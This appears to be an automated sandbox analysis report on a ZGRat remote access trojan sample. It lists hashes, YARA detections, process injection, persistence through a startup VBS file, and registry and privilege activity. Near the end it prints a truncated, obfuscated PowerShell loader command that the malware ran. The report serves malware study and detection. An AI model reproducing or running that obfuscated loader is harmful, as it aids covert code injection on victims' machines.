zgrat | cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169

Analysis

max time kernel
113s
max time network
98s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
15-05-2024 01:22

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

133fda00a490e613f3a6c511c1c660eb.exe
Size

4.5MB
MD5

133fda00a490e613f3a6c511c1c660eb
SHA1

e34f9f1c622a7e6d3cb34217b0935ebdaab8ebe9
SHA256

cac0056b23a93519a5f4e526e52187f37b88373c76aa065b9f895d1ecd4f4169
SHA512

f4dd02b04326e37a3368d9c385b363689f877ae43c16de103efada642f41fe85580939db84a030597e3032d6da407d073af2b64160feec6fe38f37f1b473fffd
SSDEEP

24576:ypPiRcjGOOiX3Sl9L7MupXdagdle6whTeo5A4T9W+xjaCsyfwUmvHX+ODvz8JQDm:

Score

10^/10

zgrat rat

Malware Config

Signatures

Detect ZGRat V1 34 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4052-2-0x0000000006590000-0x00000000067D0000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-6-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-22-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-20-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-34-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-37-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-52-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-50-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-48-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-46-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-38-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-30-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-28-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-44-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-42-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-41-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-32-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-26-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-25-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-62-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-67-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-58-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-56-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-54-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-68-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-65-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-60-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-12-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-10-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-8-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-18-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-16-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-14-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1
behavioral2/memory/4052-5-0x0000000006590000-0x00000000067CA000-memory.dmp	family_zgrat_v1

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

Processes:

WerFault.exeWerFault.exe

description pid process target process

PID 944 created 1352 944 WerFault.exe $77d7e828
PID 1852 created 1352 1852 WerFault.exe $77d7e828
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs

Processes:

powershell.EXEsvchost.exe

description pid process target process

PID 2728 created 616 2728 powershell.EXE winlogon.exe
PID 1924 created 1352 1924 svchost.exe $77d7e828
PID 1924 created 1352 1924 svchost.exe $77d7e828
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat
Drops startup file 1 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs 133fda00a490e613f3a6c511c1c660eb.exe
Executes dropped EXE 2 IoCs

Processes:

$774c65ac$77d7e828

pid process

2204 $774c65ac
1352 $77d7e828

description	pid	process	target process
PID 944 created 1352	944	WerFault.exe	$77d7e828
PID 1852 created 1352	1852	WerFault.exe	$77d7e828

description	pid	process	target process
PID 2728 created 616	2728	powershell.EXE	winlogon.exe
PID 1924 created 1352	1924	svchost.exe	$77d7e828
PID 1924 created 1352	1924	svchost.exe	$77d7e828

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77Kaxhwswfup.vbs	133fda00a490e613f3a6c511c1c660eb.exe

pid	process
2204	$774c65ac
1352	$77d7e828

Drops file in System32 directory 7 IoCs

Processes:

svchost.exepowershell.EXEsvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exepowershell.EXE

description	pid	process	target process
PID 4052 set thread context of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 2728 set thread context of 2336	2728	powershell.EXE	dllhost.exe
PID 4052 set thread context of 1352	4052	133fda00a490e613f3a6c511c1c660eb.exe	$77d7e828

Drops file in Windows directory 1 IoCs

Processes:

WerFault.exe

description ioc process

File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

836 1352 WerFault.exe $77d7e828
2236 1352 WerFault.exe $77d7e828

description	ioc	process
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe

pid	pid_target	process	target process
836	1352	WerFault.exe	$77d7e828
2236	1352	WerFault.exe	$77d7e828

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exemousocoreworker.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exemousocoreworker.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WerFault.exe

Modifies data under HKEY_USERS 52 IoCs

Processes:

powershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.EXEdllhost.exewlrmdr.exe133fda00a490e613f3a6c511c1c660eb.exeWerFault.exesvchost.exeWerFault.exe

pid	process
2728	powershell.EXE
2728	powershell.EXE
2728	powershell.EXE
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
4444	wlrmdr.exe
4444	wlrmdr.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
4052	133fda00a490e613f3a6c511c1c660eb.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
836	WerFault.exe
836	WerFault.exe
2336	dllhost.exe
2336	dllhost.exe
1924	svchost.exe
1924	svchost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2236	WerFault.exe
2236	WerFault.exe
2336	dllhost.exe
2336	dllhost.exe
1924	svchost.exe
1924	svchost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe
2336	dllhost.exe

Suspicious behavior: LoadsDriver 64 IoCs

Processes:

pid	process
4736
4216
1052
844
4876
1012
1600
1492
4872
848
384
2832
2000
3892
3884
1468
3860
1680
3780
4244
1000
4688
2636
1224
4392
1432
4756
1316
4480
2728
1744
3844
4600
3824
3264
3300
2576
3268
668
2088
2600
732
2680
4048
3420
4724
4276
2704
3588
1572
4612
4596
888
1312
3408
4828
4816
5056
3684
2748
1168
664
4956
2964

Suspicious use of AdjustPrivilegeToken 28 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exepowershell.EXEdllhost.exesvchost.exeExplorer.EXEWerFault.exemousocoreworker.exe

description	pid	process
Token: SeDebugPrivilege	4052	133fda00a490e613f3a6c511c1c660eb.exe
Token: SeDebugPrivilege	2728	powershell.EXE
Token: SeDebugPrivilege	2728	powershell.EXE
Token: SeDebugPrivilege	2336	dllhost.exe
Token: SeAuditPrivilege	2580	svchost.exe
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeRestorePrivilege	836	WerFault.exe
Token: SeBackupPrivilege	836	WerFault.exe
Token: SeBackupPrivilege	836	WerFault.exe
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	3452	Explorer.EXE
Token: SeCreatePagefilePrivilege	3452	Explorer.EXE
Token: SeShutdownPrivilege	2608	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2608	mousocoreworker.exe
Token: SeShutdownPrivilege	2608	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2608	mousocoreworker.exe
Token: SeShutdownPrivilege	2608	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2608	mousocoreworker.exe
Token: SeShutdownPrivilege	2608	mousocoreworker.exe
Token: SeCreatePagefilePrivilege	2608	mousocoreworker.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wlrmdr.exe

pid process

4444 wlrmdr.exe

pid	process
4444	wlrmdr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

133fda00a490e613f3a6c511c1c660eb.exepowershell.EXEdllhost.exelsass.exewinlogon.exesvchost.exe

description	pid	process	target process
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 4052 wrote to memory of 2204	4052	133fda00a490e613f3a6c511c1c660eb.exe	$774c65ac
PID 2728 wrote to memory of 2336	2728	powershell.EXE	dllhost.exe
PID 2728 wrote to memory of 2336	2728	powershell.EXE	dllhost.exe
PID 2728 wrote to memory of 2336	2728	powershell.EXE	dllhost.exe
PID 2728 wrote to memory of 2336	2728	powershell.EXE	dllhost.exe
PID 2728 wrote to memory of 2336	2728	powershell.EXE	dllhost.exe
PID 2728 wrote to memory of 2336	2728	powershell.EXE	dllhost.exe
PID 2728 wrote to memory of 2336	2728	powershell.EXE	dllhost.exe
PID 2728 wrote to memory of 2336	2728	powershell.EXE	dllhost.exe
PID 2336 wrote to memory of 616	2336	dllhost.exe	winlogon.exe
PID 2336 wrote to memory of 684	2336	dllhost.exe	lsass.exe
PID 684 wrote to memory of 2628	684	lsass.exe	sysmon.exe
PID 2336 wrote to memory of 964	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 60	2336	dllhost.exe	dwm.exe
PID 684 wrote to memory of 2628	684	lsass.exe	sysmon.exe
PID 684 wrote to memory of 2628	684	lsass.exe	sysmon.exe
PID 684 wrote to memory of 2628	684	lsass.exe	sysmon.exe
PID 684 wrote to memory of 2628	684	lsass.exe	sysmon.exe
PID 2336 wrote to memory of 400	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 904	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1036	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1080	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1112	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1128	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1268	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1300	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1324	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1460	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1480	2336	dllhost.exe	svchost.exe
PID 616 wrote to memory of 4444	616	winlogon.exe	wlrmdr.exe
PID 616 wrote to memory of 4444	616	winlogon.exe	wlrmdr.exe
PID 2336 wrote to memory of 4444	2336	dllhost.exe	wlrmdr.exe
PID 2336 wrote to memory of 1496	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1540	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1612	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1652	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1660	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1748	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1764	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1876	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1884	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1908	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1940	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 1376	2336	dllhost.exe	spoolsv.exe
PID 2336 wrote to memory of 2100	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 2164	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 2348	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 2388	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 2400	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 2532	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 2580	2336	dllhost.exe	svchost.exe
PID 2336 wrote to memory of 2628	2336	dllhost.exe	sysmon.exe
PID 1268 wrote to memory of 1148	1268	svchost.exe	sihost.exe
PID 1268 wrote to memory of 1148	1268	svchost.exe	sihost.exe
PID 2336 wrote to memory of 1148	2336	dllhost.exe	sihost.exe
PID 2336 wrote to memory of 2660	2336	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:616

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:60

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0aaf3614-dbb1-43c9-9e5d-cd0b2b734deb}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2336

C:\Windows\system32\wlrmdr.exe
-s -1 -f 2 -t Your PC will automatically restart in one minute -m Windows ran into a problem and needs to restart. You should close this message now and save your work. -a 3
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4444

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:964

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:400

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1036

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3064

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:axylMltnpBep{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$CXiJXfVxnkdRml,[Parameter(Position=1)][Type]$VuxHBlLMlw)$DfakNndwyPK=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+'e'+'c'+''+'t'+''+[Char](101)+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+'ga'+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'n'+'M'+''+[Char](101)+''+'m'+'o'+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+'le',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+'l'+'e'+'g'+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+'u'+[Char](98)+''+[Char](108)+''+'i'+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+[Char](105)+''+[Char](67)+'l'+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+'ut'+[Char](111)+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$DfakNndwyPK.DefineConstructor(''+'R'+''+[Char](84)+'Sp'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+'N'+'am'+[Char](101)+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+'B'+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+''+'P'+'u'+[Char](98)+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$CXiJXfVxnkdRml).SetImplementationFlags(''+[Cha